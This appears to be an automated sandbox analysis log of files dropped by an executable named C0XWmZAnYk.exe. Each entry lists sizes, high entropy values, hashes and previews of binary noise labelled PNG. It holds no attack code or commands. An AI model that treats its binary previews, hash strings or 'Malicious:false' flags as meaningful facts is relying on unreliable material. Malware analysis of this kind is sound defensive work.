              File Type:data
              Category:dropped
              Size (bytes):3253
              Entropy (8bit):7.947303544029727
              Encrypted:false
              SSDEEP:96:ptXSzuffrx9tMyEa77c8s0Mw/y66sxoWDooR:ptXRDxMyEa7k0fx6sxoKooR
              MD5:FC9DF0E25F0F8BDD54D5D526A8EF13C3
              SHA1:EC9A194E96777018BAF7AEBB3DB31D45A87BC8CE
              SHA-256:65F6CE0D536383C7B4AADDAB2EC768E12EF911C84475A027F0F1863ED3C7B481
              SHA-512:37980FC775D76EBFF193415E21EC7DBA7436456F17A743C11575DDFA86C02BE9805284C6091F568242A808F879257A4EAD330EAD5351652A491486EB75A11B32
              Malicious:false
              Preview:.PNG....M=..."{...+:~....D.w...%A.:e..Mk.f....G.m..%U......%w.a....Jl=....^.7..>.s.:.by..D.4....8..A}.b.`..D......].aY.}.q.....X5.=.Hp3\..YO...d......C....X.^9.:.IJ$....(..#N.Y...^.......6.B..>..`.o........d.....].?I..3:+"N.Z.D(b.V....^....;...<...t.X...../....q.d..e5T.g...GN.Dm{j.,.6...F'z.QQ'*....C<z46u`....U..5....,-...iOs..*po5M....,...%...li6....y......<M..Go......?S..{a...%.)~..0(..E.."$..J...T.N.Mea#q[.W...0.....42>...O.Y....t..M...Xdx...Ic.xc|..)..af..a#X..B.wrP...H....kQ..M.2.I&.G.Y..L.w| ..&.L{*.....O........D..I..d.d.h....Ha......6........d....oiv....`.e.`T..9`.O...a...z...5....|[.....C.....|..Y./.,,....<.%.w......r.efLB]..."c=..Pjf.V<.H..../.R..J.kZ.Az.8.`..hf.../[..Z.a.S.{V......#9..;.Z.".4..>...2..s..pX..ID..0RhV....A....:4.....r^n.u.....^_!h..^>...>.../a.iN..=.9..oZ.T.&.H.+..r.Z.#..Z.3.=.........>..0.a.}Y2".z....*..^.@....*:...z..R.......Otn...*.......m$.......wu.w%CH..*..z)..$O....o/{+.CQY...9.nU+.@.........8....-....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):12565
              Entropy (8bit):7.984722238268525
              Encrypted:false
              SSDEEP:192:lxW0cb7yjLq3nU90onazY/sgjWvIXJmpPzCQvrZvRM2EDbAnIcoX3DtWWkOR:lA08wDcUzjwIZ6Pzjdvq683DtWbs
              MD5:E7322CC5B736BDE6152E71A0741B199E
              SHA1:42CCE1B69E19FB19260189E0F28CD2D0547BCB7D
              SHA-256:11B28747EAD7566711A34235FE89C8DF3BB9BADE92FE6F071B5B664C1F254198
              SHA-512:A9412ABC61BB612D7ADA98DB6C90C51A80CE8A0C53F84960B89E9BFD949B80BC7350331B9D627B5D86A155DFCE8070DDA62B3E5DFC46AF99BAB81E8271C6592A
              Malicious:false
              Preview:.PNG..wS..L.)%j7.>..g+....Q..&.P..:kBmc...b..f..O.i...".0..b..[v.....-V..47.D.D.dM-^.PY.D.7.......:......#.....P..1=.v.wm..........q.\......x(9....>.B.tG..7W.t..K_..-..1...@.... .!........E....e.J7A.#.\.."....Z.n.k../3.Q.o.._..kXFg.'N}..4.qq...4.0.(~BO.`..Cl6K6.H.../.:X.p...6..Ap...Y.j....x...h..@...F.8.@....B..|..H.Jb-.T.Lv.]|3.z......@~..#.~.T.M?I..]^5Z.T..'..tq.........W.Ew.....B...@.E.D\lfw...g`....?..m.&..QA../..U>........4lX3..,......1}...E..I..62...D....=....j./.M..E.c.F.{..M...r..&.........v|k..>.L.N1..k\.....I^..F..U.....wp.(...Y..M..L..{...n...nX>IW.....).K..^*AN.#A...(.v.`...4.....=..2.~.+.3[...x?.7.&......jon}.#..*.n.ZKx.W...}:Y.>F}P3...wq.p......*w2%VS.c.P.....[.1...e.....P(x......*b*.+../`.......i\I,......].\.Gf..8...s..X?z`o..X!...U.&j3.....I.%.a1.....0.o.....:..6.Z.....H....0...-.@z..u.C.&.p&.?..~"...4...8h...b...E..M.......#....8}..:&.)...G|..V..2....).U.C>.(...UD]jS.I:..>.{..b)U....U}.N..._....<6.......9w?F.~;%..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1892
              Entropy (8bit):7.902025331844533
              Encrypted:false
              SSDEEP:48:btUVwIIzxeCO6KoV/jVHzYRzH1D55Q1cXqg38D:bnIqxnbKoVyH1A
              MD5:F3890A7A36A9B23058536476B2D6BCEA
              SHA1:BB9E881D293A826A233F30D3B94A1DAAA3A34483
              SHA-256:67A0FE71CFAEB83B3055528D2F20C5421CBE90E072747695DC35099320211E20
              SHA-512:01CF29DC538C025470A1DF325FCD6C7B05B136F47C3D10ECEB6A00B20F9027EE71CCC86A0C355622EE23AF58B5324DFF38EA3BB0E8505E2CFC46BDF35BDF7878
              Malicious:false
              Preview:.PNG...v}x^..L..^!.+.[.0..../^.!.7..1....p.Lh..=..6....?-8.v.......CA...i.....f.U........a..~2%...R1r..C...U.R.Z...-Y..LqD.g...ih..~..9......f..h..@.....5.m..A._..p..1..@......PO]v...'.O....'...~..X....`;.?../`......zF..;f.=6...Bo...G'.y.fm./.....M...._5..`.h..^.d%FU.9...Th..f...RZ(R.TZ..{..3..RI....7.6......o!)ci..X.|.$.v74$.x..o.'..B..s...?...m.!.O .{^.............[~..1g.tj...=Q./..."..kW........2.....v.7.k..`'6...Ztf.si...m.^.g.'.I.-...b..w....=.....^t.3@:S...}..g....P...........$.d..H........`.WF...5.+W..cI.z.Xj..4..H....B......T.....].N.....B....sQ....`.Z.OB.i.~.6......:.fT.X#t..}....u...0.|#+)/......o..A.,G...d..7.`..sK.tKl.D_..=.......@...G..v...d.X.....C.....O..Hw..tw....J..<q2....e........#...{5..dM....E...Mi...ezR....I.Y........rK...^.4..[....T......s....i.I.U.w......9?/...BGi.........P..Z.6D.gV+&-.J..4..G.o...%.O....'.....Bb...o..<..`.Yph.EX..nR-H.JM........1..{...af.YRfW..c..g.0.)....N...R..k.Z..S..+../<Ej*...zRu ..]....ht.../a!..b2...tm
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2715
              Entropy (8bit):7.939253118115129
              Encrypted:false
              SSDEEP:48:A2v6ilpsheq34/GO5xULaIMNWD0S/t480itgANrtmV+XCTJUKJvaXl68D:AU58iVkMID0SFttZmUXqSKJvKlb
              MD5:3CF5B2E5ED0C3B047B413C9E1CC280D7
              SHA1:1EE8AFA5724D6E1D406BA92509B7304E095D1EAE
              SHA-256:DBCF2EF2C7D50AEAA785DFBF38BB29933B7A8AF3C208A5F7DCDBCD9DEA7CEDF1
              SHA-512:51E88B658B15E189DB682EC3E2BB1DEA6AA7113BA3D73CFB3B765F2522143719136DC11209C339F72E2BF9FC7FDDC9ABA4DE2CB9DCDD0FC36D1DD67CEC021D9F
              Malicious:false
              Preview:.PNG...?5.s..>._k..wOX~....*.6....>....[......$..H.........g0s.'fp.*..qp`I..1..5.R...Nx...Q.1L%....&}.H....c........#.?.Q.OP..X.:.y.eB..o.....)...@..2.~..`.G.E..u..8M...._...m..i.\7.]x...............q.a..J.MWk......Eq+.7.x..........I.r:....y......5o]..xH....S..3g.X..9.G;.....b<..>.O...aJ..L1...`\.............a.y..?...O ..r.-.a.....s...X.{..X\...*......c.X4.1.......o.EZ(p.......+.H.t.....(..{..h....."......-.,.R..$.T.iRR..;r@.A....B2m.Aa.R..f..x.....3.{..B.B.BNE?.f..6Zp.Q.",......`.Zh_.f.6t..u.^..C}\^^..Hz......gMV...a...@ND)W.....S4...2.f.p*....'..=,.S.$...z.*8..B.....$.V..l....1%_.(..(..2.9...X.z..........=.0N...,.?.....[..~.q.]....+.....e.....N...k......p.J.A.w7.?Wo7..*=.#\.....x.i..mo...0.H...l+~..e[.....|`.^.zu.....b.I....... ...J..e(..>.?...y*..O..g.-..Kq?....&1..>p53T.....).......WnoP..s.h...h.E4.\.t.yp.L%..|.:.t.......P..>g.Qq..R..Nt..A.>tl.d.7.S.".o..x....}B.w]h..~..pQ..P.u|.'.k.^.>.jLt[..;..5..&.N..d.?..+.Q..8.....T....*..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3330
              Entropy (8bit):7.949251913332542
              Encrypted:false
              SSDEEP:48:KFm5woxeImUtQefsmTmqxy6LpADW02YJVW5OCGQU83zHwTloLOeeznHmjCGFRWkI:KFm5CIjzTe6LcTW8HQUPqLOe+eCig1
              MD5:DC5257658CB2F160B6D4DF73C750D07A
              SHA1:5E270C1C368777C8C324F5ADFE78E1A047014AF5
              SHA-256:ADA69A6BA53114BB80C2FFFDB6F91682F4CA91449E0FFE9D85E5449552FF0923
              SHA-512:FFDCDBB23C28FB2CAAE7824894328C7D94DC69A5929FEDD008B5B3322E7316677EEBD36C806C7403612845D1BDA5D08DA060E1A316414BBD54343FFD15F4B1B8
              Malicious:false
              Preview:.PNG.{.35....hGj..0&.e...Ze_d7.4P..7..4.Xh...x....[..3....b.(Q.(T_...t..+pLE.C....JB.....^v%6..a..=..".m..9,d.H..U....5...o.......#.......$B. )....=e:.....Z..&..3V...#i.'.....R+...SCT..-?..WG.U,......b..b$.\.`.)S.....1.....M.3mr...q...Y..].\5.-..).<f.Ii~>*..ZU~^....z...M...0oW.*3wd..o}....6..~."W....^....I(...C.<uq.e.!.S.:61..f`.T..6.>.5...?._...k..`g....L...{.......:?..<.j<...K......1@^r.X...*...R:..%ky.}..}.al.x.+g.o.I.U.+.......\W<.%v..'2\.a.......{...f.gC.....Q\.U..qdS...H'L.;n..B.f.}...}.....'..;J.;..4..6..Z...w.ze.v...e.....:..Y...w..#.q..{.p|.. .......e..G4*gPz...d...8..=.o...wa....MC5....B..y...Bli......F.v.Mm<.?..n.. y...H....R.......h..C...:Z..UOCi.....$4........YH&.[..=.2.sLI.<|...0...,...b..\.....oE.>.Ouv..t~]g.K..8.$.F..iN..N3:.....{.... ...L......#Z...S........<...._i.N..aY..j.....w.....>..(\l....N.$....`f9..(f*V..o..I.w..-...v8._p...I..(............%QY.})..T.V.^3.........883K.@]n0u.qt....$.....4....-8..a....}W...rD9
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):4188
              Entropy (8bit):7.95782023853414
              Encrypted:false
              SSDEEP:96:ps+eXN3sUGvaPS4Sorg0u+9zFgxXix/0k58+5jNPmpb3wLcjMlE:ps+e93p2p0u+9CxX8358stmb3w6WE
              MD5:84B50482A720519F3B10D4BEE6A091ED
              SHA1:0A1B6655A6AABBBFF7A7245A11B492016D519671
              SHA-256:9F4DB0AF86B2CCA6802343B410BECC83A76856C831E65D9C471533870CF2ED38
              SHA-512:E680D343086D61596A93ED604974584AE90101173C388C28AC6D9C422AD104FC6E3646203F194F9662C08F7C842D404A7BE2512D4F47133467F911970F738AD1
              Malicious:false
              Preview:.PNG...f/....".m8....6."..V..{.~.g.*..V/.....d..>...Hn\..d....f..@.a]..!0..IgW:r..F..C.?.P.'..*.`X.O1........mF....=J.... ..d..k...:@..H.......w].&.]....C^D...."..`..a.....<..L6.-...H.]..A._....c....VS. bP.y.w!Z.......9......".jd...qf..Q.\...s.Gl.Kf..G..q..F....4.ipM...*v.x..ZG.K..0p...S....G=....y=..p.7P.Y.2..bsJ1t....pF*r................;........X.....H.w...d..=L$...w..;{f.f.t......`..<..q~0......X..8.l.>..U...R*G.=].(.W....a.{[T...h".....(&66..C.....6...MG.0....cN.5.....tI..~%}v.......Yg.A8.F.... .lP...9....N.X.fO../..R .V...?T....h...a..L.........c..CQ..E]F......Y). ....Uf8..M..U!|...[8>.at.s.&v.Q`.F.^...,...c..6.t8Qo.H.P....Y......Z._..0...[0.(.q....B.FR...=....GzC.F.g..`.8.tZ..|."._pS...6\j.J........b?S...{..GS...8.o...\c..r.&......L~.j..(.X.x.6.l.j.......B.gNK.L.1\h@.S....).9..+.s.gI9.............U..m.l./x.f.^T,<..es......../.V]..1f....`..r.'...J..46..!...bx..Dnw..MzjK7...w.*...T../...!U.J...t;..fM.(..>.I..W+.e..3,n?..0F..=..r.S.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2267
              Entropy (8bit):7.9218556070990545
              Encrypted:false
              SSDEEP:48:7FsrySq538lwv94oJevU8MDRFjcZAm0UsRRL+1SoC1vi8D:7FsUu+eoJeibYSm0UIRy1gT
              MD5:9051DD536DD5A931292107DC7310B7B4
              SHA1:8ADD846B0A07980AE135F5BE7F1401EF4552FB91
              SHA-256:E442175BCDC8F511F5FEEBDD17FE30F70D218C51AF7D1A22A7096EDD62F3E318
              SHA-512:312B59D868DA9C7EBA879C9CD8001D5218478EFF60C6D662C8A524A94A300129CE0551FE4D6E965129E22206128D01B05A9E56239F5F5AA6BC8F6A27E280BC21
              Malicious:false
              Preview:.PNG...al...r.2K`.W.-.e..U.p...3........B:B.}l...j.G,..z..3....S.k6..W....=y*.pH.3.b.jn`.z..^t.....}..........:...G...`..Es.4(....sTn..fH..U.../.r1&.. ..8=yqz.i,..Q....T..o..^...7%\G..?M..[.$H..Q.f9.`lk......Z.....P[.............@.^q....b`.u.y...{....%.........xj.UA..8.B....s'o3..^.....yCR@cN`Y...pMZ+.....u.Q.....bJ....kf.|...$E...a(.e...b4....+.....#.-..=....q.v..U...mn.n.S..=.G]..lq.Y...h.F=..4.I=B?.7.97<.......=".x.Y.....H.?m.......|g.P..1.... .l....xV..l`p.=...1!B.5.......oE...<T..i.F.+.b|...U.7...[..!...Y.....W.N=...Y...s,|..r>$........B..%yU-...!*....$....b.P..........Y[jp}.E]Z._o.R(...Vy.U.....{......)).=..F.u...|W.!r......."....." z....e..../Et..cH.\...`a...fi.......e...yv.'.5.0J.....I..^...c.%[..=V...u....ad..X.V|.........U_.._. .Y../....su=..A#.Q.G..C.{.....Z..Y..`.E[.....| .."8r....w.X.{?O..L.f^.".,..|c.Kbu......d+.=a..=.ns.d.V...2......RD.@.....t>8.p..z.....n...g&...H..qK.-.hK..P.I....E*&z..m...../$qr1&<.GML0.$.o'.U.[7..r
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1547
              Entropy (8bit):7.868003076902425
              Encrypted:false
              SSDEEP:24:bHs5UoQsLV/P/pGth5txyA61N1IvVMep0MMRqu0DxbttPfP+64/rad+bD:RoJLVHyDyVZcpi2bPP+6uQ8D
              MD5:C0E9695EAA384282119D565BB9E5164A
              SHA1:9EDF62FCBEA13CD378C16AC9131EEA9C7ACF9732
              SHA-256:B1574617F0C3A59CAD603E21C92576E4CE8E1ED077C26B383F4E13248DD5E724
              SHA-512:F7D6246DD6BD121C4BAABEA71836018F88F46826BC061A65A782DE49199FFDA9E7B2D20B1B4E94B38C812892A27EBEB069A0FCF103982C5A0CAF8FD55BF9F967
              Malicious:false
              Preview:.PNG.<Qxl..yB..Pc..dt..x`....U.1.,.=7}......~o.{Q,..T.8.y.$.....K5.`...n'.kE.1.8.....;q...F2.M.LV.%...+..p..7,.<<.`4H...G...>..v.k....3...}"......=.K1..8....6..s9..Q.^.V.N......AK.....F^..A.9.A.......Hy........0).0:..u.G7.h.K>6L..f....f.E..k4..+!....i.".u.#.....sl.......X._...%nu........z..k..f....>"..^f..?!.2.....bI1),.hs..v......pey.\.4....8...(V[..=.Ua.....B..61............]5...T.HPW..\H6..p.2V.0(h.y#..m...|.j.2...<.f..`..v0....N..sD.7.Z.z}...Bi+........q.,Fm$..lj...][8v..f=.).g.-..Q..%...........k..4 F...jUC...../.K....k...p...u.Ey.p...v.......U...Q..^.g-.rn~..}...v.#.....q..n..e......u.sP+....r...V...l|....4..h.....G...V.U|.+....e......5@.BdE..unI.%.@...+.......x(..dV...y.P.-D.N..I....y.P. .R'..\..%...v....1...:*b`jWE-..]Cq..@..LP...z.4.py...&..q..+....v;..{.c..lY..Y.u.5.....CI.xp.[..q6=.W...5.]E..b.=...db........Pw<.p.:..L."...;U..`..@'.&4..CbcE...u...h8...6.....v.....r..A.6.w.yN.L.....W...........%.........._...`..!..Q..z.j.@3..8.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):4375
              Entropy (8bit):7.950277232289497
              Encrypted:false
              SSDEEP:96:Nfw+7QFxdWnBNk7qSUaWAdhrnC0XVbMS05SV4FiVeoimTZ:gyk7Nui5nNXEhF6biA
              MD5:65413DCEEEE20E10284F8546EFE1946F
              SHA1:13CB7CFE38E79837C65337629D6DBA5FEF0CB065
              SHA-256:C03DC86BA7B674626A5326819965869B908302AE7679FA2CCE8BBEF1FC39634E
              SHA-512:AFC141C717ACD71C0572FD68564B0D63E8AC67E9DB65C8D0C7795D6C2829FD130E26FFB9AF4F9CB100A832565DFDF75B2F85BE52F002D17D64BC4A48E5AD113D
              Malicious:false
              Preview:.PNG.$g..^....<.A..`...7..&...<I..ni..J...vb^.A...p.c.,..c....I8t..C.......Gxe...l.........w.......w.;./....s.+..--.......Z..J+.Z.>.......~.*..r/\0..">F.mN....R...j.|............J8.F.l......;#|:..X[.....K..V....]....B..S..KXq<..{&H...e..^k...J.+..q......*.m'.>..c.w....z..'....j..V.9..L..7j.$N....iH..VVS.|#Y\)....f......3./.../..}/n`(../C...7........F.......?%....}>.q..(.....K!kdBl/..{O..\B.i....^.\..,c..aK......j...r....k...h...Q......g.[Y.........?2a..6...2.v..d(7.......k..^(..^\K.3c..5/.K..J._....Q..7.bB...=Rk..$6.9W..H.O>L..4P;b..e..h;=.,.|.X.$"E{.t...v...*>..Y..amUC.....t...8..9.Z.<a%..l........Z<9'gV...M5Z<.R.K_=l[.....[.#..q.e.L...F.=,.:.?........K.>Ks.._...../t..@.t.q..........~R.e....bV9;@..[...d.(....Q4K........P.m.2G..z4.sz...N.=..f.Z..Y......;.``..i.s5..z.....;:.B6p...z..q.9.-J...(.r.7.U+...1.^.1.q..A".x.e..(.3.....<.$".T.3.........K.=&....*../;m..._0"..R..?......l*..:..5.$.;.|.W...SF.<.....L.6.......o.t.@....u.....G.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1224
              Entropy (8bit):7.812532597760767
              Encrypted:false
              SSDEEP:24:ptM6mhimsZewACC8RvIESX8NBvmR7Q7o1sMX9fK7Npd+bD:7MXcvAR8RvEX8j8z5K58D
              MD5:AA4D7E2882D82F9887EED9642DAB4244
              SHA1:AFA41A4057E4265726D60038F925AFFF909645D3
              SHA-256:9F5A6067CC5F2EEC1542393C5562DE58C0EA0847A55363C34CD0B0D88A1EA0F9
              SHA-512:D6E096584A843F7D11C773777A4E515BAC95C5B787C0C889976650257FAF50F48511851D2B8AA508D1E5E98FF3F6E72F12819FAD34034DF00A6B969842E07696
              Malicious:false
              Preview:.PNG.}.^.X....8...jyu....\u....f..p..}.H.4.F......M-Pan..t Y....ZC...z.&..~.....ju.c.m...NUsH5.u..p....Z...^..Z[....R...7n.\...D.....{;.G..(./...VSr..Y.. ..)<.4c.;.1....>.*.N...OH.j...3...!'....*....0!.b=`.(#*V$.....IlA]2.....+r).4..<.w..}.....c<y..t.n2.H!........Ve@...J...:...t.?..W.H.A.........P.#.|Xw...t.M......|t3Y..(.]...........\?.`vU..w....W$V.W(R...=....cj...t..#..N.2_3...Q?...5..$Mm.B.-.Q....)K.p.A.}..R.q...d.X....(SI.R0K.-...j.._$#.j..X.RP[X.XkE.7#...X(X>..M...u[WGaI1..1,.0..l.x..1.....CF-..Z.D...efa..7..........~.).DGc...:..l.iJ....I{..z..Wx..#.;^b...'....8i.{...f./..h......x.&...<.y.X.]....jS....^P.Ai/~+_:..D...b.<..xh...5(...~.9.9x..7.._.T..Kp.../.-w.H.....Mo-.....E...`...r.I7....3.st'z.(G.M...z."7.....p....V.PK.{{..;..H'%v..E..w...Hi_OC.Nxx.....T~.++.0..K.m...Y6..'].~t.....=..|.X.2a............WB..:L. ...uE.G...H.....<?_.!-...5.t.{..h..3#.K.E4..@..g.A..A...S...=.p.._.Ou.0...kE..g.)......F...._..A.\.P...Z......ZS.S.*...!.....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1482
              Entropy (8bit):7.868272403988394
              Encrypted:false
              SSDEEP:24:yKItnSFV8VwmQLsFhEkYntqykKy0wr6Ayv8ChyAWad9cxdQtTUMfclagqDysbd+X:BItng8VwmQ2mkYtqay0wZyvRhyAxd9YH
              MD5:D3FA0C68607A80CCA093F8C4DFD2561D
              SHA1:830CA8E703CE0CDF21944FE40E5DB80FF55217C1
              SHA-256:D5435C9EAB99057419D56ED72B9CEBACDFBFE5D4ED1C0D90F9CB0A69F3DF6457
              SHA-512:CA8673CDC439AB4337638C16B2F1F0E62ADF00E0303C1266BDDED945A46C2CDC72CB8A85D16E8B96616D37B6835124CFBB9B42D40C54AF953A2BC174CE92D1DD
              Malicious:false
              Preview:.PNG..#..5N.V.}.....&G%D..:;.... ..m..j..BK[%.u1....B.^.w...Z......M.J........U..|-M..U.....S;TC..H.GgR..(....h......oz..x*w...t....9^@...P..K.1...@n..?.5G..1......<}.a.FE7..F.p..G>l...O*..x3...3.'.\.K..r...KHU.dS...Q.....4..W.+.#).1.F..2..^f.!.......T..L...n..S..H..=...,..`...z'I.m)...g..Lp..?.d...k......?.h....O...1.>W..\;%.O...}....&...3..f.#.H....>.W..6.*.xF.wc.... .g..1;Vu6|@.x..Y.o !o..,/..*t..3lz.S.V.y.x.;..Y.u....j.....0.o..c'X..`3...:.f..ppnW..tMw.x........."...\Bk1..v.s...H7...I[...!....[k..\_d.n.@v.=e.5..".;K..(3k.w.t.8*.q.....$.~J.9.T3...>E9...y...y.........5.V2..I.8....;..e{.................2.@T.....n..$.n..2t.]..I..x1&.#C...~{..m.0.g.C..%.<i.8m...$n.....-.P./.~'OI.....P.Wl}u.. I.m~ .2......].r...H`x.~.....H...d...u....sf@-k..TT..p...p.....r..c...o.M..o..t.y@.J...W.."7.(..9D.s..I./....Dq.....5.O.~M..,...S......c.!2.}.9fP...[.....#b.Y...}...F..rj..ZB.B..*vl#rW4..L.A.dk.+o.F...(cEr..^....*l.<.99../._q/......PT '..U.S).U.#G..G....,
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1634
              Entropy (8bit):7.862630184893424
              Encrypted:false
              SSDEEP:48:BTwbdoEVbyaMuoCzggG5QOzaZABr20/BDr3NiMEmHbxt8D:1wbqEByawtQ9K20J/dbEm1i
              MD5:0D29F8CA5F31D8CFE9458F7DA3ABEFE4
              SHA1:18CED11A7FA92CAE77B58E5A7FB988EE8E19B68E
              SHA-256:ECE38DD0A0D51F18B2DB355E8EE9545ECFB447E2F7E02DFBC6896217C3B71980
              SHA-512:2CB27B39E16CF2F187CF7BB5066DEC64A8AA3144038FD082256753C519A3929E1F8FB4E668EBFA8EE98E55FE84A8F77D27C7ACD1190527C3CB5A9B116DD75742
              Malicious:false
              Preview:.PNG.......=mDJ.t...0gF...=~.......r.......~y..AbW(....'H...0QnJ............JM.8T..I..q..*p.3Z..B....i.v.<..'.;3bq.R....K....Yc6.+.3a.:{j.0J..5..Z..x.%...9..T...0..k.3.....a ..n..S.99/:.!.......O..H}......d$.D.E..i.cj......m.9.L..U..$......3b.@.i....&......#w2.vx...p...G/v..! ?.N.W.....=..[n.i...G..^...l..8..'.....Z....a......d...U.7.......[)I.>.-...?......$.<.2..U..... .......ev0.^.&.<..".8'0.....c..Ag.y~y..hA....N....}...f.... ..b....k.M..O.4XL.... P;._N0.\.T.A.......M.e..v... .'%.gU.y.........a...C..C..~.A. 3..e.zy.O....r...40m.!k.....E.j......T.......O.!`...1..Ufxv7..D.E..o...89...I.AZd..8....w...?.$-.Y.......q.A. 7..B..... D....tH...l....!d.#.$Z..~..L-4.,.x.h........*..."..'....6.R.um......iJ.,2..p.....J"....6*.........MBhh.t0.)?0.O!Q.._..ro.z.CO.........i:.C .*.e.[..oL.Q....+.....S.eD|...W..2.7.V..Aa..r..x.7..V7_["W7...%.:..A....).l...mVoh~..F.<:.Aj.F... .[.........$_h.J...`.y..#.......G...j...0.7L....w/...~..,......M.o.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1839
              Entropy (8bit):7.8858356500358
              Encrypted:false
              SSDEEP:24:jXVZ7toWT0+z6oESZkKKniO/cs7xjbK5CNfwV2jTvPegkQmGU2So0pvGhDCTIPd4:j+40C6oPMnXUy3M2IcjTRUaMGheT88D
              MD5:0B31C20BBB36DC106D34C6B2774B5589
              SHA1:F587FDA10AB1C735B28F0CDF07A068E9B0F41A7B
              SHA-256:4D88D02CBAF75A1F3883BDDD9C0C7DE721F46E059C6AC7B353A1C57F78AC88BB
              SHA-512:F399566B289EA4B45554BE22924E1DD51975E3736D7DE7E52112598C5EAFB085ADD8E44138076BC216E084D259275841DD38127D43F0D66A291AD8AE50197A33
              Malicious:false
              Preview:.PNG.p..;.b.f|z3..t.......tc_......UCd,S...[...1.P.'.z.u<FB9..^.(.r...T1;K..o3#Y.."c..`'7c..........q.....>X.C.j...\|Y......}[.>..j.]...u..Ii..M.N.K=/y._..'`....++.u.t.e.~...M.../e.l.&M.....0.5.......)\.Q...[.c.......9..Lz5'.5....\.G.m9..+q..1,..t..(.Y9P.:...z|rIN|.s;6>........].....Y....n....f...+.%0Q..r.'....B.l1=I..d..qx.Mi.P.,..!.h..p.r.z.8...t.K.N..v.J,..`O.'...!.....6...u._..nk)..6..82;H5.%.vU...]....7K....x.N.G.f.(-!.....G?......D..N....bM.bf.U.c.edI./L..uLm.. .^..R*3...C/...}....4.7......v....C... c....Zi.....N..5#.xz.l.uc..[0.\.Z..~G`~;.G.\..7.So.....W.ZC...p..b.+...B.A.F..E.`%...$Fz........c4..s.y..g~....?eo.l..T..F...oH.~.....}I....!(.._..rO...7H....?...gok...S60.i....o.DU.....Y[.+....?.......f./.q..,.....t....9.....N..?S....`k..U...9..xi..2.A./.u=..'..V..z.5..C.....m/<....R....3.JO......,.|.Q.I.C2m.!..t.ca.A...R.c.[..W.......r0.v....F..j.L.6.d.......T.F..I.......-...$P../.,..b}....'..f.~?.".W...\.$h.Z."-d....Q2.."\..?.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2342
              Entropy (8bit):7.902334278941739
              Encrypted:false
              SSDEEP:48:Chb9zIK1sw/8ZVkflKZh5JvSkX/IOOUMH2T+lx7Ju8D:CV9zIK1sFV55JxgmMpZX
              MD5:BAAAD78B3065EDE9CE0A5BC4CF76FCDC
              SHA1:6EF41B2AF6EAECCB2874CB06A2D12B2D135C6B0B
              SHA-256:FBBCEC406FCFB6470C6262FA080525B1543200030DCCEE1C7A646B0683CF6085
              SHA-512:68643E947627BEB9B9CA594D350B5908A8885BB456CE7065EB95CF3132C4C83588CD09D7B76C68D69D26AAFE5F479870DE2845E8642F421F4D913BF020DE1C39
              Malicious:false
              Preview:.PNG...xnO.....T...l..uP...o.c. .].V........B.1B.W.+...N....w.S.'..;.......V...X9......V...u.{.(.8}D........z...@./&A...V.p....3[.....N....n.....k....k..(^%.........a.-....4P.J..?..eu5.B.....S..>g.8?....%5../$~}T6.DN....m...{?......../...X....!?...eP...{.....].D.9......^.1...>(}J\..4w....T.:?R{.i1M*+..O{.!K.F...o.B...H0..tBU.|g....\.W.pG..V...f..5}.{....l...X...@%}j~...._..{n.p.0.-i.|......2.}........X.&.Av..l'....T..`.4.?{...}&c......6S..9.1..Q\..U.....5.KJ.."}.../.@.)...j k.&....\..\.e.6h..&s.k(G....l$....z5fb..5.zXW.(.....b..kU.....Z...H#......E#.......K...(......(..3x...E.:..Qt..D...Er.*..@$..f..{..5.....?T..c-...'.\...8.....`}..9.I;_.\E..k.....T..#./.^..i.&...uO...p.."..cn-=...T.7.e.`S_..=Mn..w.%q...t..L....).+,..E`.>7.:+.......t..W..uW .g..U0;-.B.cqYF..]ER...1A@.b!(.P}:..(./C........)z-].q..<0.)_c..&c..#yx-N...t....8.~.S.%..<.+....*.2.;.g@&..G.R!......7.W....~...l.....#..X...}..-...P=......%SSgZS&F\...g.....m.?u..0(.....U.O.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1569
              Entropy (8bit):7.863805548920695
              Encrypted:false
              SSDEEP:24:iY0i13d9rfnuoYV0wEOW4/HbuH+d5OBgeBa8ViUwFokGXmtjgd+bD:v51t9raVoOf7JmgejVl1XmtjW8D
              MD5:5A986CAF22D563509F2F7859A581DBB7
              SHA1:42A8B5287C18BDBF2CB48DA6FAD9F27E9A9ECDEF
              SHA-256:B3657A22F1F18AC58A5AF368551B928E94E434297840F115EA35F91DB452B05B
              SHA-512:CAC70A92FA7EC434A13C3BC16A69EF73803481CF3C03FEAF2B7BC2046D90251272A741D12613F1AADCCE5AA88035A1E6CD519CA6CE1BBC5AAEB889878097D79E
              Malicious:false
